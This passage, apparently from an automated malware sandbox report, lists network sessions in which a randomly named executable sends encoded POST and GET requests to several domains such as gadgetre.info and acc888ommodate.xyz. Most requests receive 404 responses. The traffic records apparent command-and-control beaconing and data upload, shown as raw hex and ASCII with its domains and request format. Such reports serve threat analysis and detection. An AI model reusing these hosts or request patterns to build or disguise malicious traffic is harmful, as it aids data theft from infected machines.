                                                                                                                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 190


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                12192.168.2.449880104.21.90.137801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:58.256155968 CET511OUTGET /eaqq/?Tr=kdnPUNSPd0&JZOtU=NxubQmq32TFwA/AheIz76Ea+WQ99/GP2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYoTrL75hLvWNXnWLMBeEVcMza3YNaS2pisc= HTTP/1.1
                                                                                                                                                                                Host: www.ana-silverco.shop
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:16:59.486824989 CET847INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:59 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROENz4pmIO7tJtmEOnMzBV%2FbbB7QtIGe1M99XebE7TAis5sSU4olrQyJWrvygdyHvCAQrzF%2FDBLGiuL9ZkIep2vUU7YHxsV20LdPGHamYhcno%2FhwQStRNrItpxxIYt1C5QIwFAqa%2FTE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8ea128a269f743b2-EWR
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1679&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=511&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                13192.168.2.449896209.74.77.107801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:05.337042093 CET775OUTPOST /8q8w/ HTTP/1.1
                                                                                                                                                                                Host: www.gadgetre.info
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.gadgetre.info
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 6c 4e 4f 2f 77 31 36 55 6f 37 32 75 4a 59 41 4a 46 54 47 56 44 44 65 54 36 37 66 46 36 48 4b 6c 78 59 30 57 35 6b 35 61 6e 41 56 4f 4f 62 4e 33 32 49 55 4d 43 74 71 4a 5a 62 6d 54 49 59 74 50 6f 45 32 4d 71 71 65 68 4f 42 6e 69 52 6d 58 52 66 75 5a 6d 70 30 71 4d 69 31 6b 2b 42 33 5a 67 44 74 36 4d 68 43 61 6d 45 4c 47 4b 4b 58 74 45 53 6e 33 30 4c 4a 73 49 59 47 75 43 53 4a 46 6a 34 74 37 68 79 69 31 6e 75 72 4a 5a 59 77 43 4c 4f 50 34 71 4c 64 2b 4c 66 77 2f 64 48 56 67 4e 47 78 53 72 55 34 6b 5a 63 46 51 52 56 74 6b 42 38 76 58 64 31 62 46 72 4a 56 42 71 7a 6d 73 49 33 41 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=lNO/w16Uo72uJYAJFTGVDDeT67fF6HKlxY0W5k5anAVOObN32IUMCtqJZbmTIYtPoE2MqqehOBniRmXRfuZmp0qMi1k+B3ZgDt6MhCamELGKKXtESn30LJsIYGuCSJFj4t7hyi1nurJZYwCLOP4qLd+Lfw/dHVgNGxSrU4kZcFQRVtkB8vXd1bFrJVBqzmsI3A==
                                                                                                                                                                                Nov 29, 2024 09:17:06.465441942 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:06 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                14192.168.2.449903209.74.77.107801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:08.059864044 CET795OUTPOST /8q8w/ HTTP/1.1
                                                                                                                                                                                Host: www.gadgetre.info
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.gadgetre.info
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 6c 4e 4f 2f 77 31 36 55 6f 37 32 75 4a 34 51 4a 44 7a 36 56 45 6a 65 51 6b 72 66 46 77 6e 4b 68 78 59 34 57 35 6c 38 42 6d 79 42 4f 4f 35 46 33 31 4d 34 4d 4d 4e 71 4a 53 37 6d 57 47 34 74 45 6f 45 36 45 71 76 32 68 4f 41 48 69 52 69 62 52 66 5a 4e 6c 76 6b 71 53 70 56 6b 34 50 58 5a 67 44 74 36 4d 68 42 6d 4d 45 49 32 4b 4a 6e 39 45 54 44 72 7a 56 5a 73 48 62 47 75 43 57 4a 45 6b 34 74 37 50 79 6a 34 76 75 70 78 5a 59 31 6d 4c 4e 62 4d 74 46 64 2b 4e 51 51 2b 66 44 30 78 43 44 6a 61 6e 58 5a 30 34 64 52 51 55 5a 4c 70 62 74 65 32 4b 6e 62 68 59 55 53 49 65 2b 6c 52 42 73 44 47 6c 4f 4d 6d 63 79 37 65 6a 61 4c 77 6f 49 71 4f 4f 49 53 34 3d
                                                                                                                                                                                Data Ascii: JZOtU=lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyBOO5F31M4MMNqJS7mWG4tEoE6Eqv2hOAHiRibRfZNlvkqSpVk4PXZgDt6MhBmMEI2KJn9ETDrzVZsHbGuCWJEk4t7Pyj4vupxZY1mLNbMtFd+NQQ+fD0xCDjanXZ04dRQUZLpbte2KnbhYUSIe+lRBsDGlOMmcy7ejaLwoIqOOIS4=
                                                                                                                                                                                Nov 29, 2024 09:17:09.250885963 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:09 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                15192.168.2.449911209.74.77.107801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:10.858763933 CET10877OUTPOST /8q8w/ HTTP/1.1
                                                                                                                                                                                Host: www.gadgetre.info
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.gadgetre.info
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 6c 4e 4f 2f 77 31 36 55 6f 37 32 75 4a 34 51 4a 44 7a 36 56 45 6a 65 51 6b 72 66 46 77 6e 4b 68 78 59 34 57 35 6c 38 42 6d 79 5a 4f 4f 4b 64 33 7a 64 34 4d 4e 4e 71 4a 4f 4c 6d 58 47 34 74 46 6f 45 69 41 71 76 79 78 4f 45 33 69 51 48 48 52 5a 74 68 6c 68 6b 71 53 6d 31 6b 39 42 33 5a 50 44 73 57 41 68 42 32 4d 45 49 32 4b 4a 6c 31 45 55 58 33 7a 58 5a 73 49 59 47 75 65 53 4a 46 44 34 74 6a 35 79 6a 38 2f 75 61 35 5a 59 56 32 4c 4d 6f 6b 74 4e 64 2b 50 54 51 2b 39 44 30 38 43 44 6a 48 55 58 5a 41 65 64 57 67 55 4a 71 77 67 39 4f 69 4a 38 6f 4a 32 4c 69 5a 35 7a 33 5a 51 72 42 4f 37 65 76 76 4a 6c 6f 57 6a 42 49 64 39 54 70 61 34 58 33 5a 32 79 77 6e 72 58 62 4a 4f 30 63 61 45 69 79 4d 4a 4a 46 74 6d 42 71 7a 4b 77 43 48 6b 30 53 2f 66 33 68 72 44 50 48 51 4c 37 56 6f 36 61 76 48 63 35 6f 53 30 6c 58 39 78 34 49 44 43 38 2b 69 44 74 61 2f 78 6d 6e 39 43 50 69 65 65 48 63 50 73 7a 74 30 42 64 6a 53 68 62 4b 66 75 52 30 48 30 73 62 6c 74 54 41 76 46 49 4f 34 75 30 2f 2b 6b 41 5a 75 51 [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyZOOKd3zd4MNNqJOLmXG4tFoEiAqvyxOE3iQHHRZthlhkqSm1k9B3ZPDsWAhB2MEI2KJl1EUX3zXZsIYGueSJFD4tj5yj8/ua5ZYV2LMoktNd+PTQ+9D08CDjHUXZAedWgUJqwg9OiJ8oJ2LiZ5z3ZQrBO7evvJloWjBId9Tpa4X3Z2ywnrXbJO0caEiyMJJFtmBqzKwCHk0S/f3hrDPHQL7Vo6avHc5oS0lX9x4IDC8+iDta/xmn9CPieeHcPszt0BdjShbKfuR0H0sbltTAvFIO4u0/+kAZuQA48Iv/bls1Eg/O/S2JIQKbEZ69ex94ka6/+zKIAi6Bp97a+c5fWqLKbP6S0AdJc+sd4tUbBXjvSqD0ZCkNZ3FNNeDMpiq+WRRJZ2DsgRc4wu/m8OJ2bAoKJhiKq17huTAuOlfFna2/hY0tRuamOkqurdwYckVcDALECb6OSjBfUSHwbvvzK698eEimDYjigra2mUnEh2syRiPG/ONRZcEAiv2uNRe/uPDtWe93raCUbgoMC/i2FfX/rFI3ueMK17EYHrYLg/GG0i4cQLaAtCwjZ17mTxDVNEBrKfLQAxkIb6MRxLq62XIMbzU1KjcwL04vowW1dFbdqfyrF/dHys3/BKrhaF9R4gHT9OgOPgZZp38goZLn4mpG+rg65J/e4Z+bW9hj76vAsJ/7RA00QtrPMhJr93H3uTJx0tNvXhEzH/yLlvyhVNyOV1fXa1Pe0WIlAZ6PNeWS46Bfc+daBNmzyEQqQCE9ccbyqy6x2XCh/Kpfy4/5BjzFO2hAP3njSVQGsiori64E7ZmtZQcFXywrFfn9RJTocQ/SNjzdEau81iRoTpUJ6xFnPUzWf2uEL88/8tdD8t+MUePcrCZoAqUv/SsgClAVG0s+YN1EwvGn64mS5bHUUjckk4uNAi0Wo6RKGeWJPE9YWFc4Kjrws0c+8iwQPWHwhqZN [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:17:12.133003950 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:11 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                16192.168.2.449917209.74.77.107801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:13.600614071 CET507OUTGET /8q8w/?JZOtU=oPmfzDvAiIeWP+diGQfRGlPJ8sXtmBaGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8ormKyt2wgYmNmcIv/8C26BoWgGWFvXlTdI6M=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.gadgetre.info
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:17:14.845067978 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:14 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                17192.168.2.449933176.32.38.130801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:20.429390907 CET790OUTPOST /j1io/ HTTP/1.1
                                                                                                                                                                                Host: www.acc888ommodate.xyz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 4c 34 41 54 31 67 4d 56 77 4b 73 32 71 43 4a 36 33 46 54 54 58 49 73 71 30 55 56 67 78 77 77 65 31 47 37 55 79 4b 76 7a 74 6a 58 63 73 6a 38 47 4f 46 31 62 73 50 56 44 6e 4e 65 64 7a 4b 4d 79 2b 36 47 54 44 6c 31 65 61 48 73 75 58 69 55 4e 31 6c 6a 6a 62 31 53 4a 73 2b 4f 58 4e 54 69 41 44 62 35 51 54 6e 4c 34 2b 58 55 61 61 4c 53 4c 76 49 67 41 4b 41 65 6a 46 74 68 68 6b 6c 76 55 34 72 48 52 53 4e 37 6b 44 4b 75 6f 38 4e 4a 43 41 46 53 7a 6f 61 70 69 6f 70 77 76 47 73 4c 47 53 73 53 4a 4c 35 70 6f 44 35 34 34 4d 72 34 65 46 35 54 2f 77 4e 6d 62 4c 74 4e 7a 32 44 56 6f 48 77 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=L4AT1gMVwKs2qCJ63FTTXIsq0UVgxwwe1G7UyKvztjXcsj8GOF1bsPVDnNedzKMy+6GTDl1eaHsuXiUN1ljjb1SJs+OXNTiADb5QTnL4+XUaaLSLvIgAKAejFthhklvU4rHRSN7kDKuo8NJCAFSzoapiopwvGsLGSsSJL5poD544Mr4eF5T/wNmbLtNz2DVoHw==
                                                                                                                                                                                Nov 29, 2024 09:17:21.789715052 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:21 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                18192.168.2.449939176.32.38.130801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:23.088888884 CET810OUTPOST /j1io/ HTTP/1.1
                                                                                                                                                                                Host: www.acc888ommodate.xyz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
